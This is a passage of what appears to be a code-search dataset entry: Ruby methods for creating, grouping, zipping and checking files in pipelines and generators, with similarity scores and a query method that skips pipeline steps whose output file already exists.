"def group_files file_data, output_path, options = {:prefix => \"L\", :suffix => \".fastq.gz\", :exclude_undetermined => true}\n\t\t\t\t# alternatively inherit the parent class and call super???? \n\t\t\t\t# super \n\t\t\t\t# \t\n groups = {}\n file_data.each do |data|\n if data[:barcode] == \"Undetermined\" and options[:exclude_undetermined]\n log \"# Undetermined sample lane: #{data[:lane]} - name: #{data[:sample_name]}. Skipping\"\n next\n end\n \n group_key = name_for_data data, options\n \n if groups.include? group_key\n if groups[group_key][:sample_name] != data[:sample_name]\n raise \"ERROR: sample names not matching #{group_key} - #{data[:path]}:#{data[:sample_name]}vs#{groups[group_key][:sample_name]}\"\n end\n if groups[group_key][:lane] != data[:lane]\n raise \"ERROR: lanes not matching #{group_key} - #{data[:path]}\"\n end\n groups[group_key][:files] << data\n else\n group_path = File.join(output_path, group_key)\n groups[group_key] = {:group_name => group_key,\n :path => group_path,\n :sample_name => data[:sample_name],\n :read => data[:read],\n :lane => data[:lane],\n :files => [data]\n }\n end\n end\n \n # sort based on read set\n groups.each do |key, group|\n group[:files] = group[:files].sort {|x,y| x[:set] <=> y[:set]}\n group[:paths] = group[:files].collect {|data| data[:path]}\n end\n groups.values\n end",
"def write()\n entries = Dir.entries(@inputDir); entries.delete(\".\"); entries.delete(\"..\"); entries.delete(\"yamproject.json\"); entries.delete(\".DS_Store\")\n io = Zip::File.open(@outputFile, Zip::File::CREATE);\n writeEntries(entries, \"\", io)\n io.close();\n end",
"def create_own_results_file(filename,output)\n # Create a blank file and put the output in\n self.create_file(\"#{filename}\", output)\n end",
"def prepare_target_dir\n begin\n FileUtils.mkdir(@output_dir)\n copy_default_files\n rescue Errno::EEXIST\n puts \"-- #{output_dir} already exists -- canceling initialization. \"\n return\n end\n end",
"def add_default_files_to_definition\n mkdir_p('files')\n default_files = File.join(File.dirname(__FILE__), '../../files')\n files = []\n chdir(default_files) do\n files += Dir.glob(\"**/*\")\n end\n files.each do |filespec|\n dest = File.join('files', filespec)\n unless File.exist?(dest)\n src = File.join(default_files, filespec)\n if File.file?(src)\n destdir = File.dirname(dest)\n mkdir_p(destdir) unless File.exist?(destdir)\n # puts \"cp(#{src}, #{dest}), destdir => #{destdir}\"\n cp(src, dest)\n end\n end\n end\n end",
"def post_process(file)\n if File.basename(file.to_s).match(/library/)\n oldfile = file\n file = file.to_s.sub(\"library\", @options[:lib_name_u])\n FileUtils.mv(oldfile, file)\n end\n if File.dirname(file.to_s).split(\"/\").last == \"library\"\n origdir = File.dirname(file.to_s)\n dirarr = origdir.split(\"/\")\n dirarr[dirarr.size-1] = @options[:lib_name_u]\n new_dir = File.join(dirarr)\n mkdir(new_dir)\n oldfile = file\n file = File.join(new_dir, File.basename(file))\n FileUtils.mv(oldfile, file)\n FileUtils.rmdir(origdir)\n end\n if file.to_s.match(/\\.seed$/)\n out_file = Pathname.new(file.to_s.sub(/\\.seed$/, ''))\n # Don't overwrite a file of the same name, unless they --force\n if copy_check(out_file)\n template = ::ERB.new(File.read(file))\n # This binding has access to any instance variables of\n # the ProjectCreator instance\n result = template.result(binding)\n File.open(file.to_s.sub(/\\.seed$/,''), 'w+') do |io|\n io.puts result\n end\n end\n # Remove the seed file whether we copied or not\n FileUtils.rm_f(file)\n end\n end",
"def create_initialize_files\n\n #todo 扩展根目录,注意后期同样要添加参数配置\n empty_directory 'modules' unless Dir.exist?('modules')\n\n\n empty_directory \"#{module_path}\"\n empty_directory \"#{module_path}/app\"\n empty_directory \"#{module_path}/app/controllers\"\n empty_directory \"#{module_path}/app/helpers\"\n empty_directory \"#{module_path}/app/models\"\n empty_directory \"#{module_path}/app/views\"\n empty_directory \"#{module_path}/config\"\n empty_directory \"#{module_path}/config/initializers\"\n empty_directory \"#{module_path}/config/locales\"\n empty_directory \"#{module_path}/db\"\n empty_directory \"#{module_path}/db/migrate\"\n empty_directory \"#{module_path}/lib\"\n empty_directory \"#{module_path}/lib/menus\"\n\n\n copy_file 'init_.rb', \"#{module_path}/initializers/init_#{module_name}.rb\" # 启用各模块必须的文件\n copy_file 'routes.rb', \"#{module_path}/config/routes.rb\" # 路由文件\n copy_file 'en.yml', \"#{module_path}/config/locales/en.yml\" # en多语言文件\n copy_file 'zh.yml', \"#{module_path}/config/locales/zh.yml\" # zh多语言文件\n copy_file 'init_data.rb', \"#{module_path}/lib/menus/init_data.rb\" # 配置文件,比如:菜单、功能、权限(action)等\n\n\n end",
"def do_not_overwrite!\n @overwrite = false\n end",
"def create_cds_multi_fasta_file(options)\n require 'bioutils/rich_sequence_utils'\n require 'bioutils/glimmer'\n extend Glimmer\n\n default_options = {\n :cds_multi_fasta_file => \"cds_proteins.fas\",\n :verbose => false\n }\n options.reverse_merge!(default_options)\n\n options = MethodArgumentParser::Parser.check_options options do\n option :root_folder, :required => true, :type => :string\n option :cds_multi_fasta_file, :required => true, :type => :string\n option :sequence_files, :required => true, :type => :array\n\n end\n\n Dir.chdir(options[:root_folder])\n\n files_with_cds = Array.new # a list of files containing\n options[:sequence_files].each do |sequence_file|\n sequence_format = guess_sequence_format(sequence_file)\n if sequence_format == :fasta\n if options[:training_model_prefix]\n puts \"Predicting genes for file #{sequence_file} using training model ....\"\n run_glimmer_using_model(:input_sequence_path => sequence_file, :prefix => options[:training_model_prefix],:glimmer_dir_path => options[:glimmer_dir], :suppress_messages => true)\n predict_file = File.basename(sequence_file, File.extname(sequence_file)) + \"_glimmer.predict\"\n elsif options[:training_sequence_path]\n model_file_prefix = File.basename(options[:training_sequence_path], File.extname(options[:training_sequence_path])) + \"_glimmer\"\n if File.exists?(model_file_prefix + \".icm\")\n if options[:verbose]\n puts \"Predicting genes for file #{sequence_file} using training model ....\"\n else\n print \".\"\n end\n run_glimmer_using_model(:input_sequence_path => sequence_file, :prefix => model_file_prefix,:glimmer_dir_path => options[:glimmer_dir], :suppress_messages => true)\n predict_file = File.basename(sequence_file, File.extname(sequence_file)) + \"_glimmer.predict\"\n else\n if options[:verbose]\n puts \"Predicting genes for file #{sequence_file} using training sequence ....\"\n else\n print \".\"\n end\n predict_file = predict_genes_using_glimmer(:input_sequence_path => sequence_file,\n :rich_sequence_training_path => options[:training_sequence_path],\n :glimmer_dir_path => options[:glimmer_dir],\n :suppress_messages => true)\n end\n else\n if options[:verbose]\n puts \"Predicting genes for file #{sequence_file} using iterated glimmer....\"\n else\n print \".\"\n end\n predict_using_iterated_glimmer(:suppress_messages => true, :input_sequence_path => sequence_file, :glimmer_predict_filename => File.basename(sequence_file, File.extname(sequence_file)),:glimmer_dir_path => options[:glimmer_dir])\n predict_file = File.basename(sequence_file, File.extname(sequence_file)) + \".predict\"\n end\n if options[:verbose]\n puts \"Converting #{sequence_file} glimmer prediction to a genbank file ....\"\n else\n print \".\"\n end\n glimmer_genbank_file = glimmer_prediction_to_rich_sequence_file(:suppress_messages => true, :glimmer_predict_file => predict_file, :input_sequence_path => sequence_file)\n files_with_cds << glimmer_genbank_file\n else\n files_with_cds << sequence_file\n end\n end\n\n cds_multi_fasta_protein_file = File.open(options[:cds_multi_fasta_file], \"w\")\n read_cds_and_write_to_file(files_with_cds, cds_multi_fasta_protein_file)\n processing_indicator(5)\n\n cds_multi_fasta_protein_file.close\n end",
"def create_cache_files\n @cache_path_names = {}\n each_file_set(:create_cache_file)\n write_cache_path_file\n end",
"def keep_files; end",
"def generate\n files = Dir.glob \"#{Settings[:direcotry]}#{Settings[:mask]}\"\n files.each do |f|\n if (!File.directory?(f) && !File.symlink?(f))\n puts \"processing #{f}\"\n begin \n i = Image.new f\n # this will skip anything that imagemagick doesn't like, GIGO\n rescue MiniMagick::Invalid\n puts \"#{f} is not an image, skipping\"\n next\n end\n\n if @list[i.md5]\n @list[i.md5].filename.push f\n else\n @list[i.md5] = i\n end\n end\n end\n end",
"def reset\n @file_extensions = []\n @file_patterns = []\n @check_patterns = []\n end",
"def prepareForFile(filename)\n end",
"def setup_run_artifacts\n FileUtils.mkdir_p(\"./#{Dir.glob(\"#{$VALUE}/\").max_by { |f| File.mtime(f) }}test_logs\")\n FileUtils.mkdir_p(\"./#{Dir.glob(\"#{$VALUE}/\").max_by { |f| File.mtime(f) }}test_report\")\n FileUtils.mkdir_p(\"./#{Dir.glob(\"#{$VALUE}/\").max_by { |f| File.mtime(f) }}test_results\")\n FileUtils.mkdir_p(\"./#{Dir.glob(\"#{$VALUE}/\").max_by { |f| File.mtime(f) }}test_screenshots\") unless File.exist?(\"./#{Dir.glob(\"#{$VALUE}/\").max_by { |f| File.mtime(f) }}test_screenshots\")\nend",
"def initialize(name, metadata = {})\n super\n @files = {}\n end",
"def files=(_arg0); end",
"def create_image_files_where_needed()\n @file_info.data.each do |line|\n uri, filename = line\n process_file_info(uri, filename)\n end\n end",
"def output_path; end",
"def create_files\n tests.each do |test|\n FileUtils.mkdir(test.id.to_s) unless Dir.exist?(test.id.to_s) if test.option[:dir]\n files = []\n files << test.action.split('?').first\n files += test.option[:implicit]\n files << test.result_rdf if test.result_rdf\n files << test.result_json if test.result_json\n files.compact.select {|f| !File.exist?(f)}.each do |f|\n File.open(f, \"w\") {|io| io.puts( f.end_with?('.json') ? \"{}\" : \"\")}\n end\n end\n end",
"def overwrite!\n @overwrite = true\n end",
"def clean_output\n @jobs.each do |job|\n logfile = Pathname.new(\"#{job.pattern.dirname}/#{job.pattern.basename.to_s.chomp(job.pattern.extname)}.log\")\n logfile.cleanpath\n if logfile.file?\n # puts \"Deleting log file #{logfile}\"\n logfile.delete\n end\n end\n end",
"def initialize input_files\n @input_files = input_files\n @input_data = Hash.new\n @output_data = Array.new\n end",
"def ensure_files!\n fatal! \"Cannot read from #{@stdin}\" unless File.readable? @stdin\n [@stdout, @stderr].each do |f|\n dir = File.dirname(f)\n safely do\n FileUtils.mkdir_p(dir) unless File.directory?(dir)\n open(f, 'w') {} unless File.exists?(f)\n end\n next if File.writable? f\n fatal! \"Cannot write to #{f}\"\n end\n end",
"def create_files\n tests.each do |test|\n files = [test.action, test.urgna2012, test.urdna2015].compact\n files.compact.select {|f| !File.exist?(f)}.each do |f|\n File.open(f, \"w\") {|io| io.puts( f.end_with?('.json') ? \"{}\" : \"\")}\n end\n end\n end",
"def generate_objects(output_folder, types, version_name)\n version = @api.version_obj_or_default(version_name)\n @api.set_properties_based_on_version(version)\n (@api.objects || []).each do |object|\n if !types.empty? && !types.include?(object.name)\n Google::LOGGER.info \"Excluding #{object.name} per user request\"\n elsif types.empty? && object.exclude\n Google::LOGGER.info \"Excluding #{object.name} per API catalog\"\n elsif types.empty? && object.exclude_if_not_in_version(version)\n Google::LOGGER.info \"Excluding #{object.name} per API version\"\n else\n # version_name will differ from version.name if the resource is being\n # generated at its default version instead of the one that was passed\n # in to the compiler. Terraform needs to know which version was passed\n # in so it can name its output directories correctly.\n generate_object object, output_folder, version_name\n end\n end\n end",
"def initialize(data_location = DATA_LOCATION)\n @data_location = data_location\n @files = unprocessed_files\n @file_count = @files.length\n @archive_location = data_location + ARCHIVE_LOCATION\n FileUtils.mkdir_p @archive_location\n end",
"def generate_fastq\n\n # Generate FASTQ file list, expanding patterns if found.\n fastq_input_file_list = []\n fastq_output_prefix_list = []\n fastq_output_group_list = []\n ARGV.each do |fastq_input_file|\n if fastq_input_file =~ /[\\+\\?\\*]/\n # File is regexp: use it to do our own \"glob\".\n # If the regexp has at least one group in it, save the group match\n # in a corresponding list to use in making the output files.\n fastq_input_dir = File.dirname(fastq_input_file)\n fastq_input_patt = File.basename(fastq_input_file)\n\n Dir.entries(fastq_input_dir).sort().each do |entry|\n if entry =~ /#{fastq_input_patt}()/o\n fastq_input_file_list << entry\n if not @out_prefix.nil?\n fastq_output_prefix_list << @out_prefix\n else\n fastq_output_prefix_list << entry[0..Regexp.last_match.begin(1)-1-1] # Second -1 is for underline.\n end\n fastq_output_group_list << $1\n end\n end\n else\n if File.file? fastq_input_file\n fastq_input_file_list << fastq_input_file\n fastq_output_prefix_list << @out_prefix\n end\n end\n end\n\n die \"no FASTQ files found\" if fastq_input_file_list.length == 0\n\n STDERR.puts(\"Input files: #{fastq_input_file_list}\") if @verbose\n\n fastq_list = fastq_input_file_list.zip(fastq_output_prefix_list, fastq_output_group_list)\n fastq_list.each do |fastq_input_file, fastq_output_prefix, fastq_output_group|\n\n # If we are splitting to subfiles, reset the output sub filenames to\n # the new destination for the new input file; also reset statistics.\n if @save_subfiles\n if fastq_output_group == \"\"\n fastq_output_group_mod = fastq_output_group\n else\n fastq_output_group_mod = \"_#{fastq_output_group}\"\n end\n @pass_sub_filename = File.join(@pass_dir, \"#{fastq_output_prefix}_pf#{fastq_output_group_mod}.fastq\")\n @pass_sub_filename += \".gz\" if @compress\n @reject_sub_filename = File.join(@reject_dir, \"#{fastq_output_prefix}_reject#{fastq_output_group_mod}.fastq\")\n @reject_sub_filename += \".gz\" if @compress\n\n @stats_sub_filename = File.join(@stats_dir, \"#{fastq_output_prefix}_seq_stats#{fastq_output_group_mod}.txt\")\n @pass_sub_read_cnt = @reject_sub_read_cnt = @total_sub_read_cnt = 0\n end\n\n if @save_subfiles\n open_fastq_sub_output_files\n end\n\n # split one FASTQ file into post-filter and reject FASTQ\n STDERR.puts \"Processing #{fastq_input_file}...\" if @verbose\n fastq_input_fp = open_fastq_input(fastq_input_file)\n if fastq_input_fp.nil?\n warn \"#{fastq_input_file} is empty...skipping\"\n next\n end\n begin\n while fastq_input_fp.readline\n header_line = $_\n if header_line !~ /^@/\n STDERR.puts \"Missing header line (#{header_line})...exiting\"\n exit(-1)\n end\n\n header_fields = header_line.split(/[ _]/)\n die \"header parse error at #{fastq_input_file}:#{$INPUT_LINE_NUMBER} [#{header_fields.join(\"!\")}]\" if header_fields.size != 2\n\n sub_header_fields = header_fields[1].split(\":\",-1)\n die \"sub header parse error at #{fastq_input_file}:#{$INPUT_LINE_NUMBER} [#{header_fields.join(\":\")}(#{sub_header_fields.join(\":\")})]\" if sub_header_fields.size != 4\n\n @total_read_cnt += 1\n @total_sub_read_cnt += 1\n\n if sub_header_fields[1] == \"N\"\n out = @pass\n @pass_read_cnt += 1\n out_sub = @pass_sub\n @pass_sub_read_cnt += 1\n elsif sub_header_fields[1] == \"Y\"\n out = @reject\n @reject_read_cnt += 1\n out_sub = @reject_sub\n @reject_sub_read_cnt += 1\n else\n die \"filter field value error at #{fastq_input_file}:#{$INPUT_LINE_NUMBER}...skipping read\"\n out = nil\n end\n\n # Read the rest of the sequence.\n seq_line = fastq_input_fp.readline\n plus_line = fastq_input_fp.readline\n if plus_line !~ /^\\+/\n STDERR.puts \"Malformed FASTQ +line (#{plus_line})\"\n end\n qual_line = fastq_input_fp.readline\n\n # Output the sequence to whatever file was chosen above.\n if !out.nil?\n if not @remove_spaces\n out.print \"#{header_line}\"\n out_sub.print \"#{header_line}\" if not out_sub.nil?\n else\n out.puts header_fields.join(\"_\")\n out_sub.puts header_fields.join(\"_\") if not out_sub.nil?\n end\n out.print \"#{seq_line}\"\n out.print \"#{plus_line}\"\n out.print \"#{qual_line}\"\n if not out_sub.nil?\n out_sub.print \"#{seq_line}\"\n out_sub.print \"#{plus_line}\"\n out_sub.print \"#{qual_line}\"\n end\n end\n end # while\n\n rescue EOFError\n\n end\n\n fastq_input_fp.close()\n\n if @save_subfiles\n close_fastq_sub_output_files\n store_stats @stats_sub_filename, @pass_sub_read_cnt, @reject_sub_read_cnt, @total_sub_read_cnt\n end\n\n end # fastq_list.each\n end",
"def install_images(object)\n generated_name = Storage.generated_file_name(object)\n install_main_image(object.has_image_id, generated_name)\n generate_thumbnails(object.has_image_id, generated_name) if thumbnails_needed?\n return generated_name\n ensure \n @temp_file.close! if !@temp_file.closed?\n @temp_file = nil\n end",
"def generate()\n objects = []\n\n # generate object file tasks\n files.each do |fname|\n output_file = File.join(@build_dir, File.basename(fname).ext('o'))\n objects.push output_file\n file output_file => [ fname ] do\n get_toolchain().compile( fname, output_file )\n end\n end\n\n # Link object files\n file output_file() => objects do\n get_toolchain().link( objects, output_file() )\n end\n\n # Create top level task\n desc \"Build the #{@name} application\"\n task @name => [ output_file() ]\n end",
"def output\n super(@file_format => @file_path)\n end",
"def write_out\n @all_content.each do |venue_id, venue_content|\n manifest_dir = \"#{@base.deploy_path}\" / \"#{venue_content.sha1_digest}\"\n venue_dir = \"#{@base.deploy_path}\" / \"#{Venue.get!(venue_id).router.identifier}\"\n manifest_file = manifest_dir / \"manifest.json\"\n files_dir = manifest_dir / \"files\"\n venue_content_ln = \"#{venue_dir}\" / \"content\"\n sha1_file = manifest_dir / \"#{venue_content.sha1_digest}.sha1\"\n \n FileUtils.rm(venue_content_ln) if File.exists?(venue_content_ln)\n FileUtils.mkdir_p(venue_dir)\n if File.exists?(sha1_file)\n FileUtils.ln_sf(manifest_dir, venue_content_ln)\n next\n end\n\n FileUtils.mkdir_p(manifest_dir)\n\n open(manifest_file, \"w+\") do |f|\n f << venue_content.manifest.to_json\n end\n\n #FileUtils.mkdir_p(files_dir)\n source_files = venue_content.filelist\n venue_content.filelist.each do |f|\n #UploadManager is using the first 2 bytes of the file digest as directory names.\n #The split('/'[-3..-1].join('') restores the filename to the full digest when it is copied\n #from the upload dir to the deployment dir\n dest = \"#{manifest_dir}\" / \"#{f.split('/')[-3..-1].join('')}\"\n FileUtils.cp(f, dest)\n end\n \n open(sha1_file, \"w+\") do |f|\n f << venue_content.sha1_digest\n end\n \n FileUtils.ln_sf(manifest_dir, venue_content_ln)\n end\n end",
"def check_overwrite(list)\n return if force?\n return if prompt?\n return if skip?\n #return if session.overwrite? # TODO: not so sure overwirte? option is a good idea.\n\n if newproject? && !output.glob('**/*').empty? # FIXME?\n abort \"New project isn't empty. Use --force, --skip or --prompt.\"\n end\n\n clobbers = []\n list.each do |action, loc, tname, fname, opts|\n tpath = loc + tname\n fpath = output + fname\n if fpath.file? #fpath.exist?\n clobbers << relative_to_output(fname)\n end\n end\n\n if !clobbers.empty?\n puts \" \" + clobbers.join(\"\\n \")\n abort \"These files would be overwritten. Use --force, --skip or --prompt.\" # TODO: implement --skip\n end\n end",
"def initialize\n @output = VersionedFiles.format_options['output']\n @fm_mods = VersionedFiles.frontmatter\n end",
"def create_definition_files(folder)\n return unless File.directory? folder\n hash = Hash.new { |h, k| h[k] = [] }\n Dir.glob(\"#{definitions_dir}/**/*.json\").map do |f|\n filename = File.basename(f, '.*').to_s\n hash[filename] << [name: '', file: '']\n end\n save 'models', hash\n end",
"def check_overwrite(list)\n return if write?\n return if prompt?\n return if skip?\n #if newproject? && !output.glob('**/*').empty? # FIXME?\n # abort \"New project isn't empty. Use --force, --skip or --prompt.\"\n #end\n clobbers = []\n list.each do |action, fname|\n tpath = source + fname\n fpath = output + fname\n if fpath.file? #fpath.exist?\n clobbers << fname\n end\n end\n # TODO: implement --skip\n if !clobbers.empty?\n puts \" \" + clobbers.join(\"\\n \")\n raise \"These files would be overwritten. Use --write, --skip or --prompt.\"\n end\n end",
"def file_utils=(_arg0); end",
"def build\n entries = Dir.entries(@input_dir)\n entries.delete_if {|e| @exclude.include?(e)}\n FileUtils.rm_f(@output_file) # Make sure file doesn't exist\n ::Zip::File.open(@output_file, ::Zip::File::CREATE) do |zipfile|\n write_entries entries, '', zipfile\n end\n end",
"def gen_sub_directories\n FileUtils.mkdir_p RDoc::Generator::FILE_DIR\n FileUtils.mkdir_p RDoc::Generator::CLASS_DIR\n rescue\n $stderr.puts $!.message\n exit 1\n end",
"def gen_sub_directories\n FileUtils.mkdir_p RDoc::Generator::FILE_DIR\n FileUtils.mkdir_p RDoc::Generator::CLASS_DIR\n rescue\n $stderr.puts $!.message\n exit 1\n end",
"def initialize(output_path = \".\")\n @path = output_path\n end",
"def initialize(options={})\n @photos = []\n @config = config(options)\n FileUtils.mkdir_p(config['reprint'])\n end",
"def make_output_dir (src_path)\n delete_all_files(src_path) if directory_exists?(src_path) == true\n Dir.mkdir(src_path)\nend",
"def set_filename_from_parent\n components = parent.filename.split('.')\n if components.size > 1\n ext = components.last\n name = components[0, components.size - 1].join('.')\n else\n ext = 'mp3'\n name = parent.filename\n end\n name = Digest::SHA1.hexdigest(\"KroogiFileDownload-#{id}-#{name}\")\n \n self.filename = \"#{name}.#{ext}\"\n end",
"def make_directories!\n @sprites_path.mkpath unless @sprites_path.directory?\n @sources_path.mkpath unless @sources_path.directory?\n end",
"def build\n sync\n output_dir.mkpath\n outputs.each(&:build)\n output_dir.touch\n end"
] |
[
"0.6232518",
"0.6184175",
"0.6184175",
"0.59729785",
"0.59653115",
"0.59573036",
"0.5955682",
"0.586235",
"0.5650143",
"0.5644276",
"0.5609321",
"0.55744547",
"0.5573275",
"0.5573275",
"0.55628407",
"0.550828",
"0.5458454",
"0.5405517",
"0.5376202",
"0.5362049",
"0.5338774",
"0.5338214",
"0.5317791",
"0.53041327",
"0.5301997",
"0.5301922",
"0.5291922",
"0.52808154",
"0.5273526",
"0.5266365",
"0.5262107",
"0.52497506",
"0.52353555",
"0.52349466",
"0.5226617",
"0.52191395",
"0.5191527",
"0.5190976",
"0.5185621",
"0.51594037",
"0.5158201",
"0.5151235",
"0.5142169",
"0.51279235",
"0.511541",
"0.5114583",
"0.51105237",
"0.5109147",
"0.50936615",
"0.50881195",
"0.50842583",
"0.5082525",
"0.5079004",
"0.5078002",
"0.5063038",
"0.50601983",
"0.5045133",
"0.50429744",
"0.5015723",
"0.5012651",
"0.50091034",
"0.50055146",
"0.50017166",
"0.5001619",
"0.5001173",
"0.50010186",
"0.4991452",
"0.49808434",
"0.4970765",
"0.49681875",
"0.49572116",
"0.49527457",
"0.49497026",
"0.49455485",
"0.49416113",
"0.49396843",
"0.4936325",
"0.4932337",
"0.49310267",
"0.49176338",
"0.4914446",
"0.49134701",
"0.49108133",
"0.49065953",
"0.49046922",
"0.48981515",
"0.4896128",
"0.48911536",
"0.48870337",
"0.48861384",
"0.48790836",
"0.48749828",
"0.48740697",
"0.48740697",
"0.48685223",
"0.4866722",
"0.4864892",
"0.48636523",
"0.48628005",
"0.486031"
] |
0.5112694
|
46
|
Verbosely checks if file should be processed filename file whose existance will be checked step name of pipeline step
|
def skip_step?(filename, step)
if File.exist?(filename) && !@force_overwrite
print_e "SKIPPED #{step}: #{filename} already exists."
true
else
print_e "RUN #{step} => #{filename}"
false
end
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def file_fixture_exists?(filename, step = '')\n return true if File.exist?(Rails.root.join(UPLOADED_FILES_DIR, filename))\n\n raise \"ERROR in step: '#{step}'\\n\" +\n \" The file #{filename}\\n\" +\n \" must exist in #{UPLOADED_FILES_DIR}\\n\" +\n \" but it doesn't. Either correct the file name to a file that does exist in that directory\\n\" +\n \" or create a file and put it in that directory.\\n\"\nend",
"def file_verified?(filename)\n if !File.exists?(filename)\n notifier.test_file_missing(filename)\n puts \"=> ERROR: could not find test file: #{filename}\"\n return false\n end\n return true\n end",
"def test_file_exists?\n\t\tif @test_file_name.nil?\n\t\t\tputs \"No test data given to run. Exiting.\"\n\t\t\texit(0)\n\t\tend\n\tend",
"def test_file_missing(filename)\n end",
"def filename_present_only_if_job_successful\n if state == SUCCESS && filename.blank?\n errors.add :filename, \"can't be blank if the job state is SUCCESS\"\n elsif state != SUCCESS && filename.present?\n errors.add :filename, \"must be blank if the job state is different from SUCCESS\"\n end\n end",
"def validate_file_status(filename)\n raise IconGenerator::Error unless File.exists? filename\n end",
"def check\n prefix = File.basename(@file)\n if File.exist?(@file)\n @message = \"#{prefix} : Expected file exists\"\n true\n else\n @message = \"#{prefix} : Expected file not found.\"\n false\n end\n end",
"def file?\n original_filename.present?\n end",
"def check_for_file\n @ff.check_for_file \n end",
"def check_file\n super\n end",
"def check_file_existence (file_path)\n \"[ -f '#{file_path}' ]\"\n end",
"def checkfile()\n if not File.file?(@file)\n abort(\"File #{@file} does not exist. Aborting...\")\n end\n end",
"def file_exists?(node, file)\n _out, _local, _remote, code = node.test_and_store_results_together(\"test -f #{file}\", 'root', 500)\n code.zero?\nend",
"def file_exists?(node, file)\n _out, _local, _remote, code = node.test_and_store_results_together(\"test -f #{file}\", 'root', 500)\n code.zero?\nend",
"def generated_net_specflow_feature_file?\n name.downcase =~ /\\.feature\\.cs$/\n end",
"def validate_file(filename)\n return true\nend",
"def test_file\n\t\traise Store::Error, \"Error: file #{@file} does not exist\" unless is_up?\n\tend",
"def should_generate? config\n File.basename(source_file)[0] != '_'\n end",
"def start file_path\n\t\tfileExist? file_path\n\tend",
"def validate_file_input file, type\n @logger.debug \"Validating input file for #{type} file #{file}\"\n error = false\n unless file.is_a?(String) and !file.nil?\n error = \"The #{type} filename (#{file}) is not valid.\"\n else\n unless File.exists?(file)\n error = \"The #{type} file (#{file}) was not found.\"\n end\n end\n if error\n @logger.error \"Could not validate input file: #{error}\"\n raise \"InvalidInput\"\n end\nend",
"def filecheck\n file.nil? ? false : File.exist?(file)\n end",
"def check_file!(filename)\n unless ::File.exists?(filename)\n raise FileNotFound\n end\n end",
"def user_path?(file); end",
"def validate_file_is_t2flow\n if !@file_data.nil? && !get_details_from_model\n errors.add :workflow_file,\n \" \\\"\" + @file_data.original_filename +\n \"\\\" is not a valid taverna workflow file (t2flow)\"\n end\n end",
"def test_file?(path)\n @tests_files.include?(path)\n end",
"def autotile_exist?(filename)\n test_file_existence(filename, Autotiles_Path, @autotile_data)\n end",
"def checkForFileExistence(fileName)\n raise \"#{fileName} file already exists\" if File.exist?(fileName);\nend",
"def filecheck\n return file.nil? ? false : File.exist?(file)\n end",
"def has_file? name\n File.file? path / name\n end",
"def from_file?\n !@scanner.filename.nil?\n end",
"def file_exists?(file)\n false\n end",
"def check_for_file(format)\n File.exists?(\"#{@work.download_basename}.#{format}\")\n end",
"def valid?\n ensure_file_open!\n\n ['Makefile', 'submission/', 'tests/'].all? { |entry| @file.find_entry(entry).present? }\n end",
"def file?\n not identifier.blank?\n end",
"def has_file\n if id == nil \n false\n else\n FileTest.exists?( local_file_path )\n end\n end",
"def validate_file_is_included\n if workflow_file.nil? && @file_data.nil?\n errors.add :workflow_file,\n \" missing, please select a file and try again\"\n end\n end",
"def file_exists?(file_name)\n test(\"[ -f #{file_name} ]\")\n end",
"def check_file_context(target)\n file = target.eval('__FILE__')\n file == Pry.eval_path || (file !~ /(\\(.*\\))|<.*>/ && file != '' && file != '-e')\n end",
"def transition_exist?(filename)\n test_file_existence(filename, Transitions_Path, @transition_data)\n end",
"def is_file_input?(command_line_arguments)\n\t\tcommand_line_arguments.any?\n\tend",
"def contain?(filename); end",
"def file?(path)\n # :nocov:\n false\n # :nocov:\n end",
"def file? filepath\n self.system \"test -f #{filepath}\"\n end",
"def check_file_presence\n spec.icons.values.each do |path|\n fail_if_not_exist \"Icon\", path\n end\n\n if spec.browser_action\n fail_if_not_exist \"Browser action popup\", spec.browser_action.popup\n fail_if_not_exist \"Browser action icon\", spec.browser_action.icon\n end\n\n if spec.page_action\n fail_if_not_exist \"Page action popup\", spec.page_action.popup\n fail_if_not_exist \"Page action icon\", spec.page_action.icon\n end\n\n if spec.packaged_app\n fail_if_not_exist \"App launch page\", spec.packaged_app.page\n end\n\n spec.content_scripts.each do |content_script|\n content_script.javascripts.each do |script_path|\n fail_if_not_exist \"Content script javascript\", script_path\n end\n content_script.stylesheets.each do |style_path|\n fail_if_not_exist \"Content script style\", style_path\n end\n end\n\n spec.background_scripts.each do |script_path|\n fail_if_not_exist \"Background script style\", script_path\n end\n\n fail_if_not_exist \"Background page\", spec.background_page\n fail_if_not_exist \"Options page\", spec.options_page\n\n spec.web_intents.each do |web_intent|\n fail_if_not_exist \"Web intent href\", web_intent.href\n end\n\n spec.nacl_modules.each do |nacl_module|\n fail_if_not_exist \"NaCl module\", nacl_module.path\n end\n\n spec.web_accessible_resources.each do |path|\n fail_if_not_exist \"Web accessible resource\", path\n end\n end",
"def check_for_required_files(opts={})\n missing_files = 0\n $generated_files.each do |f|\n if !File.exists?(f)\n puts \"Required file missing: #{f}\"\n missing_files +=1\n end\n end\n if missing_files > 0\n error = \"#{missing_files} required files not found. Run `rake build` before deploying.\"\n if opts[:warning] then puts error else fail error end\n end\nend",
"def has_file?(filename)\n\t\t!self.files.detect(filename).nil?\n\tend",
"def validate_file(file)\n end",
"def check_and_print_video_file_name()\n is_success = true\n video_file_name = @options.video_file_name()\n if !!video_file_name then\n @renderer.print(\"Video: #{video_file_name}\")\n if FileTest.exist?(video_file_name) then\n @renderer.print(\"\\n\")\n else\n @renderer.print(\": does not exist.\\n\")\n is_success = false\n end\n end\n return is_success\n end",
"def check_file?(path)\n Actions.check_file path\n rescue FileError\n false\n else true\n end",
"def ignored_file?(path); end",
"def validate_filename(_item)\n nil\n end",
"def test_file(path)\n return File.file?(path)\nend",
"def test_file_existence(filename, path, file_data = nil)\n return true if file_data&.exists?(filename.downcase)\n return true if File.exist?(format(Common_filename_format, path, filename).downcase)\n false\n end",
"def filter(file, fixture)\n # return ['affix_InterveningEmpty.json'].include?(File.basename(file))\n # File.basename(file) =~ /bugreports_greek/i\n # File.basename(file) =~ /sort_stripmark/i\n # return File.basename(file) =~ /^date_rawparsesimpledate/i\n true\nend",
"def file_exists\n end",
"def relevant_file?(file)\n file.end_with?('_spec.rb')\n end",
"def checkFile(s)\n gracefulExit(\"File #{s} does not exist\") if !File.exist?(s || \"\")\n debugLog(\"File #{s} is OK\")\n s\nend",
"def file_errors_any?\n raise LucarativeAd::Error.file_type unless File.extname(@file) == \".yml\"\n raise LucarativeAd::Error.file_read unless File.exist? @file\n end",
"def should_validate?(_filename)\n raise NotImplementedError\n end",
"def perform_file_validation(_filename, _filehandle)\n raise NotImplementedError\n end",
"def exist; File.exist?(@fname); end",
